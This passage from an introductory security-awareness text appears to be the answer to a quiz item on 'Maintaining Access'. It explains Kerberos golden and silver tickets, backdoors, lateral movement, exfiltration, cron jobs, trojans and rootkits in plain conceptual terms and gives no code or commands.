Backdoors (opening ports)
Pivoting/ Lateral Movement
Exfiltration of Information
Create New Accounts
Scheduled Tasks/ Cron Jobs
Trojan Horse Malware
Answer: Maintaining Access
Golden Tickets: There is a computer network authentication protocol called Kerberos. Essentially, Kerberos uses digital “tickets” to identify systems. A golden ticket is a forgery of a powerful type of ticket called a TGT, a “Ticket-granting ticket.” In many ways, a Golden Ticket is similar to a powerful Skeleton key: it can open many digital doors, but not all of them.
Silver Tickets: Similar to a Golden Ticket, a Silver Ticket is a type of forged Kerberos ticket which attackers can use to evade Kerberos authentication systems.
Backdoors (opening ports): A backdoor can refer to multiple things: in computer programming, it refers to an intentional weakness placed by the programmers. In networking, it refers to an open port. Ports are part of the way that computers can send data to each other, and an open port is like a castle with an open gate. Every port that is open is a potential opportunity for an attacker to gain unauthorized access and exploit the system. If a port is not being used, that port should be deactivated.
Pivoting / Lateral Movement: Once inside a system, an attacker will usually want to gain the ultimate power: administrator privileges. Lateral movement refers to when an attacker moves through networks and accounts trying to reach the ultimate goal of admin access. Once they have admin access of some kind, gaining access to more and more systems becomes easier and easier as the hacker piles up more and more power.
Exfiltration of Information: Companies and organizations store valuable information on their systems. Bad guys want to get access to this information, and they want to move it from the target’s systems to their own systems. This process is data exfiltration, or data theft. The old school way was loud and fast: cybercriminals would gain access to a system, transfer as much data as they could as fast as they could, and get out. These days, however, attackers are more sophisticated. Advanced threat actors take a slow and stealthy approach: they try to get into a system without anybody noticing, then perform lateral movement, and then slowly and quietly leak data out to themselves. Sometimes, hackers can be inside a system for months, even years, before they are detected.
Creating New Accounts:
Scheduled Tasks / Cron Jobs: If you had a robot that you could program to do your chores for you on a regular basis, would you? Of course you would! Scheduled tasks, also known as Cron jobs, are tasks a system administrator can program to run at scheduled intervals. These jobs can do useful things like performing system backups, or downloading files from the internet.
However, Cron jobs pose a security risk: if hackers can get access to your job scheduler system, they can schedule their hacking tools be run periodically! It’s important to audit Cron jobs and make sure that the system is not compromised.
Cron comes from the Greek word “Chronos,” meaning time! So, Cron jobs are time jobs!
Trojan Horse Malware: Thousands of years ago, in ancient times, the Greeks tried and tried to siege the city of Troy, but were unable to penetrate the walls. Until they came up with the Trojan Horse: disguised as a gift, the Greeks hid inside the horse and were brought by the Trojans into the city. Trojan Horse Malware is the same concept: malware that appears to be legitimate, but actually contains a virus or a rootkit. Be careful what you download, because you never know what might be hidden inside an executable file.
Rootkits: A particularly vicious type of malware is a rootkit. A rootkit allows a hacker to gain full control over a computer. An admin account with the highest level of privileges is often known as a “root” account, and a rootkit is designed to give the hacker “root” privileges. Once the hacker has root privileges, your computer is their playground and they can do just about anything on your system that they want.
Information Modification: One of the evil things that a hacker can do is modify your data. Imagine you’re a huge company that invented a special patent, or coded an amazing new program. Now imagine that a hacker gets into your system and starts modifying your most important documents and files. Your company could lose vital data and business could be disrupted or halted, possibly permanently. Information modification is one of the many risks of getting hacked.